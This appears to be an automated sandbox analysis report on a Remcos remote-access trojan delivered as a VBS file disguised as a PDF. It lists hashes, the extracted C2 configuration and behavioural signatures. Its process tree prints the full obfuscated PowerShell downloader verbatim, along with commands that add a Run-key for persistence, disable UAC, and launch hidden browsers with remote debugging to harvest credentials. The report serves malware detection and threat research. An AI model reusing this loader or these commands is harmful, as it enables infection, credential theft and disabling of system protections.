Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-11-2024 14:55

General

  • Target

    FE_50602072400310161019800100024010042047501200000000·pdf.vbs

  • Size

    33KB

  • MD5

    d6f45ebf3891c5dbabcc90063267a500

  • SHA1

    e5943a4dcacd697d58287bf70e45cf054015e881

  • SHA256

    1bd88defe4347880e470dc8536cab819495a34c4320b1dac9fa4952e730f0962

  • SHA512

    25952f18ea9a949b745de4822e9a6830ea6c16d643d996db9275f8be7bc10be70a40581b48034be5ebd07720f229b54b38b7effa4e274c9a795314669a388cff

  • SSDEEP

    768:YNdasoF+ZTskr3M28uNK7Rkc94VhNxLKe9KhZh9H5u7jCx4GVVBXgdrnGu:6dasOaAkrHoNYjbU/z9jQdCu

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

8766e34g8.duckdns.org:3782

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-93TSMD

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • UAC bypass 3 TTPs 1 IoCs
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 13 IoCs
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FE_50602072400310161019800100024010042047501200000000·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2516
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Handball='Pseudonavicular';;$Spondylexarthrosis='Tyrannerne';;$Reweighed='Tornadoerne';;$Widriks='Ensuant';;$Sparkede='Dewanny';;$Sonder=$host.Name;function Burntweed($Sproggrnsernes){If ($Sonder) {$Landgang=4} for ($Seneskeden=$Landgang;;$Seneskeden+=5){if(!$Sproggrnsernes[$Seneskeden]) { break }$Ballparks+=$Sproggrnsernes[$Seneskeden]}$Ballparks}function Uniformistisk86($Sandflugters){ .($Perspektiverings) ($Sandflugters)}$bilinigrin=Burntweed ' epon HoneHavaTMygg.EverwWl.nEL.baBAm.jCYoselBodliSinge dun AniT';$Mercia=Burntweed ',omhM T po CovzEmuliFjellOperlM.laaAlle/';$Forretningsomraades=Burntweed 'OrthTFlysl Inas Eft1Resu2';$Certificering=' aan[Paten kaEVexeT.ele.PromSPeddePostrSlurVStteIOverc DagEMa ePS.nkO TamIDicanrucgTDe amAnstADisiNExt aIns GKenseMul r Int] Svr: Ind: aftspa aeProlC visuzollRBg,riHeroTTotayLomep TrarKlinOIlliTParaOT,llcN npO ShaLSne,=Pahl$ ,okFFlo Oa,tirRullRsupeEDia,TArgiN apei c.un.bjeg,irrsForeO u hm zurrBiotASterAOpsidNonieA.kyS';$Mercia+=Burntweed 'Fr e5S,nd.Vann0Smer Geog( AarWI.lti,xpinFa hdRunwo SnkwLidls Am. bentNDdseT nge Biwe1 St,0Strm.To.e0 maj;Plum ugWBrygiSa,en ber6Str.4 rbe;Papi b stxDedu6go e4Heir;Kirs Wr arChirvAsco:U,su1 ota3Tort1 Ber. Act0 Vkk)L,gg Col G DekeS ikcHerakFibeograv/Kalf2Stan0 lag1Pot,0Af,y0Nymp1Pro,0Unsc1Live Thu FMetaiKv.nrBrize EthfL veoGdenxdura/Livs1R fo3Gamb1Like.Udfl0';$Phalerate219=Burntweed 'ThorUWricS BruEryt,rFlle-FlleaMar GTopve.hanNFortt';$Tumpline=Burntweed 'Forfh.ntit llytQuadp usss Dak: Sai/Reat/Linjd subrge.li tudv mtseKnip.Enklgdigno HoloSvipgFormlLaane tel.Prerc UdsoidiomRegr/sinuuFagrcPred? Ge e socxLampp F ioO,errKlumtParc=Smled AltoRomawEbonnHylelPeepoUndea Bn.dAffi&DagdiP stdAma,=Jubi1 Spe4 AnoM A i4UdkrI VenFBrigOAnfghre,u1 HjeLUntrYFo,k9VaanSIsl,D PugULys nGlemxFruezCad KRa,gJvelb8Beam4Gapl7Tacka Var4 can7GranX Daaytri j ChaELocuECombl EliM';$Outhearing=Burntweed 'Over>';$Perspektiverings=Burntweed 'GeneiSp ge Mamx';$Sybotic='Retspraksisers';$Gisant='\Regionplanloves116.Hal';Uniformistisk86 (Burntweed 'Forr$S.imGMisrL Gulo.tteb By,AMea lHol.:PolyCF.ydOGrn n rugT .ftiMaloNEpi UC gnaSteptVeste KulnKr dEKo tSIndeSS nh9neut1.rdr=Ball$ PanE AfsNSimpvScot: FeaAVallp twap SanDIndga RaptBeviaElek+aspi$ChopgZi miTff sFlnsADimsN A tt');Uniformistisk86 (Burntweed 'Xmlr$ SkrgNe.bLCanaODoolBK ugA.omblAn e:QuirlOverE La G St,I ,ogt SnoISt.dMPr fIAf.az FibeRntgr g.n8Efte3Opht=Vens$MototOv.ruRo aMReinpRufuLRariI ,aanMuddERefl..odhsBenepWeasLSkbniRevitSolb(Gar,$UnemoStufUCuestT maHDebuE.ommaBe,oRDevai vernU plGLang)');Uniformistisk86 (Burntweed $Certificering);$Tumpline=$Legitimizer83[0];$Disnature9=(Burntweed 'U co$AndrGChorLUnl oKapiBHemoA Co l,emi:SkytGTilse asensno FXebeoFoerrDe esR.ciI drkTem R Voli VinNOmniG teoe SilRUngaN dle AfksP,rt=SndanH rsEChrowFo.s-RockoS mmBScraJParlEspecc U,etVani Sa sAbavy AgosS ortBefrePeriMMesm.Bora$Stinbc raIUnivL .ouIFortNOveriPanigYc.arD ssINstmN');Uniformistisk86 ($Disnature9);Uniformistisk86 (Burntweed '.ati$M noG rakeBiognparafKderob llrForesinveigal ksalprEuroiProcnD magKo teDockrkonon fa e rosH be.DiacH laueAninaS.opdT,leeU orrServsRump[Fl s$ lapPExcihIndeaBe ol IntePyrsrGenoaCivitC,lle ,lm2Aer,1 Dys9Firh] akv=fins$ SupMIsureOphirm hmcS.rmioptra');$Corrading=Burntweed 'I df$AltiGRovee Pacn ndsfPlseoSki rArvesR.geiU.ytkAutor Legi be n BorgKirkeYar,rTelen rooePectsTurn.CullDS rvoLandwSlaanIstalF,reou.elaClerdRefoFVizsiUdmal F oeMisu(Sub.$ImprT .anu HurmVrnep txulNynni ordnSpleebutt,Come$ResiVBjrga BetsGausa isklrestlUrkoeAfh rP,annHasteRemp)';$Vasallerne=$Continuateness91;Uniformistisk86 (Burntweed ' Van$M isG Tosl Mico SucbFizzaDi tlPo,y:Mn tTVaa,eEmprL L.vtJa.bHDugdOBugsL.amidPortebeverEpikeSt pSForp=Chef( ennTRutiE AllSKon.tSynt-St pPGlamaLib.T PerH iga Spi$F avVStaba abeSS ara.pruL .lgldan EDis RSupinc,rbE.aro)');while (!$Teltholderes) {Uniformistisk86 (Burntweed 'Gene$BordgTilvlheteoRodobP ogaafdalHypo:GritSBy,njMetaoB rofUdvaeUnderln.ntEfteetopp1Oven9Hjem4Tube=Mika$sulfB A seOptesTilstSkamoPr grUnmimf,rle Forl armsHavieSamdnT ers') ;Uniformistisk86 $Corrading;Uniformistisk86 (Burntweed 'TempsRgestAll aFichR.isaTosch- sulsDe,lLKurseLa rePalePmese Over4');Uniformistisk86 (Burntweed 'Meni$En uG TetLSen,oOverBAkryA BibLI.vo:Hat T Me eEpicLGnetT epeh,ophoBoksl ZiadFl.rE SacrLaaneForbsVen =Opva( BletFigeeUndgSBedrtKimm-For p Fava aptInh Hvedh Enva$S llv shoAFlamSMdelAO.thL EnhLIreneAtesRCampNNonaELept)') ;Uniformistisk86 (Burntweed 'Sulf$PopuGTa,tLUnc OStitB MarAMaskLShar:KredsNomit allOLsblr BrikCot.B TieSBash=For $ revGS,erLtoshODaabBN ncaStralblac: okkmAboreAm lLLu,aL Ou E e,eM RhysVaabT QuiaJenmDturmIAlarEGrmmrMoti+Chry+Ma i%Moni$Bo rlmu aeUvedgBestistarTTastiAlgoM BaniDramZRetleCribRHols8Inst3 ilt.Resec iljoJudau,uasnTospT') ;$Tumpline=$Legitimizer83[$storkbs]}$Seneskedenntrudress=320480;$Personificerede=30318;Uniformistisk86 (Burntweed 'Swan$S.dlGStilLLedeoTidsB Giga.rveLUros:ReprA Chon SubiTse S agB BruoUnreLAryaC EsuhEft eBaghSQuib Waft=Reac UrdeGRasteHrf.TStvn-huleC.rneOTo,bnM ndTSlamE Godn nrat eas Afsk$OppeVMetaAud.mS orba P alkovelUltrEFro RUnrun Deke');Uniformistisk86 (Burntweed ' Sm $ Se g F.llPhy oRengb DiraMerclFond:HuslSCoatlUnthuUnegbS rmr EntePatatCyli Syn =St i Gru [Co tS Na,yDrm.sWar.t En eBranmtouc. Wo.C ccroschwnHurrvInteeUnc rPr ttCh o]Psy,:Hen :Sn rFl forCowboHandm jerBDestaEffes Mule onc6 Unt4YnglSUnpotBendr ,roiTandnPlumg .no(Udvi$StavaStavnFilmiTho,sSpeabGilloMicrlDiv c PhahordneU imsMart)');Uniformistisk86 (Burntweed 'Hnde$ FodG.ndul FakOP,anb OttAOverlTe e: BygS Volp OmoEgrydk Bact emiRAr oO SynGActiR KonaPodof ModeN.tenBefosUnvi Ska =P ot Un,a[T adsYderyTegnSHe it SkyeUnenmBe,k.Ozelt oveE ParX onTFrit. naEPorknS.ntCPrepOSel.DSkumI ChenForhgRust]Kloa:Noum:LyseALangS,vilcSyleIThisi O j. Kung,upeESu,etShipSAndeT B sR PlaI UnsnSnozg Sat(I df$SkrusIterLTaxiUKommbTyngR DoneIntotUnri)');Uniformistisk86 (Burntweed 'Excu$LinkgAlveL P roSvanBB reAVandl.hri:MateCke kE E.sR yrseKommmWildo KarN BijIS reaGrunlWaspIIntesCoe,MFo d=Unde$Ti.bSCy lpcoacESunskUnaltVelbRSultOProggIne rMineAAferFR ceEfagbNTimbSCavi.neglsEkskUNectBSjussBasttprecrJagtiUns.NUdlaGUnde(Bede$ForeSDiste jesNMiekEHjl,SRe,ik Enge B.lDS orEFo aNArc N FarTSt lRTunguFlerDAfbrrCh.ieSa as Atts un, ety$enk.P BehE ubvrSileSFiluo Gr NClauIHaidFUnr IJordCAnt.eUpg RAspieRelaD,iffEfrad)');Uniformistisk86 $Ceremonialism;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3348
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Handball='Pseudonavicular';;$Spondylexarthrosis='Tyrannerne';;$Reweighed='Tornadoerne';;$Widriks='Ensuant';;$Sparkede='Dewanny';;$Sonder=$host.Name;function Burntweed($Sproggrnsernes){If ($Sonder) {$Landgang=4} for ($Seneskeden=$Landgang;;$Seneskeden+=5){if(!$Sproggrnsernes[$Seneskeden]) { break }$Ballparks+=$Sproggrnsernes[$Seneskeden]}$Ballparks}function Uniformistisk86($Sandflugters){ .($Perspektiverings) ($Sandflugters)}$bilinigrin=Burntweed ' epon HoneHavaTMygg.EverwWl.nEL.baBAm.jCYoselBodliSinge dun AniT';$Mercia=Burntweed ',omhM T po CovzEmuliFjellOperlM.laaAlle/';$Forretningsomraades=Burntweed 'OrthTFlysl Inas Eft1Resu2';$Certificering=' aan[Paten kaEVexeT.ele.PromSPeddePostrSlurVStteIOverc DagEMa ePS.nkO TamIDicanrucgTDe amAnstADisiNExt aIns GKenseMul r Int] Svr: Ind: aftspa aeProlC visuzollRBg,riHeroTTotayLomep TrarKlinOIlliTParaOT,llcN npO ShaLSne,=Pahl$ ,okFFlo Oa,tirRullRsupeEDia,TArgiN apei c.un.bjeg,irrsForeO u hm zurrBiotASterAOpsidNonieA.kyS';$Mercia+=Burntweed 'Fr e5S,nd.Vann0Smer Geog( AarWI.lti,xpinFa hdRunwo SnkwLidls Am. bentNDdseT nge Biwe1 St,0Strm.To.e0 maj;Plum ugWBrygiSa,en ber6Str.4 rbe;Papi b stxDedu6go e4Heir;Kirs Wr arChirvAsco:U,su1 ota3Tort1 Ber. Act0 Vkk)L,gg Col G DekeS ikcHerakFibeograv/Kalf2Stan0 lag1Pot,0Af,y0Nymp1Pro,0Unsc1Live Thu FMetaiKv.nrBrize EthfL veoGdenxdura/Livs1R fo3Gamb1Like.Udfl0';$Phalerate219=Burntweed 'ThorUWricS BruEryt,rFlle-FlleaMar GTopve.hanNFortt';$Tumpline=Burntweed 'Forfh.ntit llytQuadp usss Dak: Sai/Reat/Linjd subrge.li tudv mtseKnip.Enklgdigno HoloSvipgFormlLaane tel.Prerc UdsoidiomRegr/sinuuFagrcPred? Ge e socxLampp F ioO,errKlumtParc=Smled AltoRomawEbonnHylelPeepoUndea Bn.dAffi&DagdiP stdAma,=Jubi1 Spe4 AnoM A i4UdkrI VenFBrigOAnfghre,u1 HjeLUntrYFo,k9VaanSIsl,D PugULys nGlemxFruezCad KRa,gJvelb8Beam4Gapl7Tacka Var4 can7GranX Daaytri j ChaELocuECombl EliM';$Outhearing=Burntweed 'Over>';$Perspektiverings=Burntweed 'GeneiSp ge Mamx';$Sybotic='Retspraksisers';$Gisant='\Regionplanloves116.Hal';Uniformistisk86 (Burntweed 'Forr$S.imGMisrL Gulo.tteb By,AMea lHol.:PolyCF.ydOGrn n rugT .ftiMaloNEpi UC gnaSteptVeste KulnKr dEKo tSIndeSS nh9neut1.rdr=Ball$ PanE AfsNSimpvScot: FeaAVallp twap SanDIndga RaptBeviaElek+aspi$ChopgZi miTff sFlnsADimsN A tt');Uniformistisk86 (Burntweed 'Xmlr$ SkrgNe.bLCanaODoolBK ugA.omblAn e:QuirlOverE La G St,I ,ogt SnoISt.dMPr fIAf.az FibeRntgr g.n8Efte3Opht=Vens$MototOv.ruRo aMReinpRufuLRariI ,aanMuddERefl..odhsBenepWeasLSkbniRevitSolb(Gar,$UnemoStufUCuestT maHDebuE.ommaBe,oRDevai vernU plGLang)');Uniformistisk86 (Burntweed $Certificering);$Tumpline=$Legitimizer83[0];$Disnature9=(Burntweed 'U co$AndrGChorLUnl oKapiBHemoA Co l,emi:SkytGTilse asensno FXebeoFoerrDe esR.ciI drkTem R Voli VinNOmniG teoe SilRUngaN dle AfksP,rt=SndanH rsEChrowFo.s-RockoS mmBScraJParlEspecc U,etVani Sa sAbavy AgosS ortBefrePeriMMesm.Bora$Stinbc raIUnivL .ouIFortNOveriPanigYc.arD ssINstmN');Uniformistisk86 ($Disnature9);Uniformistisk86 (Burntweed '.ati$M noG rakeBiognparafKderob llrForesinveigal ksalprEuroiProcnD magKo teDockrkonon fa e rosH be.DiacH laueAninaS.opdT,leeU orrServsRump[Fl s$ lapPExcihIndeaBe ol IntePyrsrGenoaCivitC,lle ,lm2Aer,1 Dys9Firh] akv=fins$ SupMIsureOphirm hmcS.rmioptra');$Corrading=Burntweed 'I df$AltiGRovee Pacn ndsfPlseoSki rArvesR.geiU.ytkAutor Legi be n BorgKirkeYar,rTelen rooePectsTurn.CullDS rvoLandwSlaanIstalF,reou.elaClerdRefoFVizsiUdmal F oeMisu(Sub.$ImprT .anu HurmVrnep txulNynni ordnSpleebutt,Come$ResiVBjrga BetsGausa isklrestlUrkoeAfh rP,annHasteRemp)';$Vasallerne=$Continuateness91;Uniformistisk86 (Burntweed ' Van$M isG Tosl Mico SucbFizzaDi tlPo,y:Mn tTVaa,eEmprL L.vtJa.bHDugdOBugsL.amidPortebeverEpikeSt pSForp=Chef( ennTRutiE AllSKon.tSynt-St pPGlamaLib.T PerH iga Spi$F avVStaba abeSS ara.pruL .lgldan EDis RSupinc,rbE.aro)');while (!$Teltholderes) {Uniformistisk86 (Burntweed 'Gene$BordgTilvlheteoRodobP ogaafdalHypo:GritSBy,njMetaoB rofUdvaeUnderln.ntEfteetopp1Oven9Hjem4Tube=Mika$sulfB A seOptesTilstSkamoPr grUnmimf,rle Forl armsHavieSamdnT ers') ;Uniformistisk86 $Corrading;Uniformistisk86 (Burntweed 'TempsRgestAll aFichR.isaTosch- sulsDe,lLKurseLa rePalePmese Over4');Uniformistisk86 (Burntweed 'Meni$En uG TetLSen,oOverBAkryA BibLI.vo:Hat T Me eEpicLGnetT epeh,ophoBoksl ZiadFl.rE SacrLaaneForbsVen =Opva( BletFigeeUndgSBedrtKimm-For p Fava aptInh Hvedh Enva$S llv shoAFlamSMdelAO.thL EnhLIreneAtesRCampNNonaELept)') ;Uniformistisk86 (Burntweed 'Sulf$PopuGTa,tLUnc OStitB MarAMaskLShar:KredsNomit allOLsblr BrikCot.B TieSBash=For $ revGS,erLtoshODaabBN ncaStralblac: okkmAboreAm lLLu,aL Ou E e,eM RhysVaabT QuiaJenmDturmIAlarEGrmmrMoti+Chry+Ma i%Moni$Bo rlmu aeUvedgBestistarTTastiAlgoM BaniDramZRetleCribRHols8Inst3 ilt.Resec iljoJudau,uasnTospT') ;$Tumpline=$Legitimizer83[$storkbs]}$Seneskedenntrudress=320480;$Personificerede=30318;Uniformistisk86 (Burntweed 'Swan$S.dlGStilLLedeoTidsB Giga.rveLUros:ReprA Chon SubiTse S agB BruoUnreLAryaC EsuhEft eBaghSQuib Waft=Reac UrdeGRasteHrf.TStvn-huleC.rneOTo,bnM ndTSlamE Godn nrat eas Afsk$OppeVMetaAud.mS orba P alkovelUltrEFro RUnrun Deke');Uniformistisk86 (Burntweed ' Sm $ Se g F.llPhy oRengb DiraMerclFond:HuslSCoatlUnthuUnegbS rmr EntePatatCyli Syn =St i Gru [Co tS Na,yDrm.sWar.t En eBranmtouc. Wo.C ccroschwnHurrvInteeUnc rPr ttCh o]Psy,:Hen :Sn rFl forCowboHandm jerBDestaEffes Mule onc6 Unt4YnglSUnpotBendr ,roiTandnPlumg .no(Udvi$StavaStavnFilmiTho,sSpeabGilloMicrlDiv c PhahordneU imsMart)');Uniformistisk86 (Burntweed 'Hnde$ FodG.ndul FakOP,anb OttAOverlTe e: BygS Volp OmoEgrydk Bact emiRAr oO SynGActiR KonaPodof ModeN.tenBefosUnvi Ska =P ot Un,a[T adsYderyTegnSHe it SkyeUnenmBe,k.Ozelt oveE ParX onTFrit. naEPorknS.ntCPrepOSel.DSkumI ChenForhgRust]Kloa:Noum:LyseALangS,vilcSyleIThisi O j. Kung,upeESu,etShipSAndeT B sR PlaI UnsnSnozg Sat(I df$SkrusIterLTaxiUKommbTyngR DoneIntotUnri)');Uniformistisk86 (Burntweed 'Excu$LinkgAlveL P roSvanBB reAVandl.hri:MateCke kE E.sR yrseKommmWildo KarN BijIS reaGrunlWaspIIntesCoe,MFo d=Unde$Ti.bSCy lpcoacESunskUnaltVelbRSultOProggIne rMineAAferFR ceEfagbNTimbSCavi.neglsEkskUNectBSjussBasttprecrJagtiUns.NUdlaGUnde(Bede$ForeSDiste jesNMiekEHjl,SRe,ik Enge B.lDS orEFo aNArc N FarTSt lRTunguFlerDAfbrrCh.ieSa as Atts un, ety$enk.P BehE ubvrSileSFiluo Gr NClauIHaidFUnr IJordCAnt.eUpg RAspieRelaD,iffEfrad)');Uniformistisk86 $Ceremonialism;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1580
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2220
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%baggrundshistorien% -windowstyle 1 $Lagertilgangens=(gp -Path 'HKCU:\Software\Alperoses\').Inddrev;%baggrundshistorien% ($Lagertilgangens)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3900
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%baggrundshistorien% -windowstyle 1 $Lagertilgangens=(gp -Path 'HKCU:\Software\Alperoses\').Inddrev;%baggrundshistorien% ($Lagertilgangens)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:3136
      • C:\Windows\SysWOW64\cmd.exe
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1084
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:2516
      • C:\Program Files\Google\Chrome\Application\Chrome.exe
        --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
        3⤵
        • Uses browser remote debugging
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:3192
        • C:\Program Files\Google\Chrome\Application\Chrome.exe
          "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f760cc40,0x7ff8f760cc4c,0x7ff8f760cc58
          4⤵
            PID:1160
          • C:\Program Files\Google\Chrome\Application\Chrome.exe
            "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1892,i,15132485224878883571,4933482365270691749,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1888 /prefetch:2
            4⤵
              PID:2060
            • C:\Program Files\Google\Chrome\Application\Chrome.exe
              "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2092,i,15132485224878883571,4933482365270691749,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2124 /prefetch:3
              4⤵
                PID:4020
              • C:\Program Files\Google\Chrome\Application\Chrome.exe
                "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2212,i,15132485224878883571,4933482365270691749,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2404 /prefetch:8
                4⤵
                  PID:3128
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,15132485224878883571,4933482365270691749,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3196 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:1916
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3200,i,15132485224878883571,4933482365270691749,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3244 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:4376
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4632,i,15132485224878883571,4933482365270691749,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4036 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:2692
              • C:\Windows\SysWOW64\msiexec.exe
                C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\vfoxvwwjxllgbohkife"
                3⤵
                • System Location Discovery: System Language Discovery
                PID:3116
              • C:\Windows\SysWOW64\msiexec.exe
                C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\yhbqvohkltdlluvozqzpvl"
                3⤵
                • Accesses Microsoft Outlook accounts
                • System Location Discovery: System Language Discovery
                PID:1304
              • C:\Windows\SysWOW64\msiexec.exe
                C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ichawhsezbvynjjajamjgycge"
                3⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:2072
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                3⤵
                • Uses browser remote debugging
                • Enumerates system info in registry
                • Modifies registry class
                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                • Suspicious use of FindShellTrayWindow
                PID:3764
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
